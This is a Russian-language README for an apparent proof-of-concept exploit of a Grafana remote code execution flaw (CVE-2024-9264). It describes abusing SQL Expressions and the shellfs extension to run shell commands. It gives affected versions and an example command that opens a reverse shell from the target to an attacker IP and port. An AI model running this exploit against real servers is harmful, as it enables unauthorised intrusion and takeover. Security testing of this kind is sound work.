
Эксплойт Grafana RCE (CVE-2024-9264)
Доказательство концепции удаленного выполнения кода в Grafana (CVE-2024-9264)
Этот репозиторий содержит Python-скрипт, который эксплуатирует уязвимость удаленного выполнения кода (RCE) в функции SQL-выражений Grafana. Используя недостаточную санитацию входных данных, этот эксплойт позволяет атакующему выполнять произвольные команды оболочки на сервере. Это становится возможным благодаря расширению сообщества shellfs, которое может быть установлено и загружено атакующим для облегчения выполнения команд.
Viewer или вышеGrafana >= v11.0.0 (все v11.x.y затронуты)
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001
Этот скрипт предназначен для образовательных целей и использования в контролируемых средах, где у вас есть разрешение на тестирование безопасности системы. Неправильное использование этого инструмента может привести к юридическим последствиям.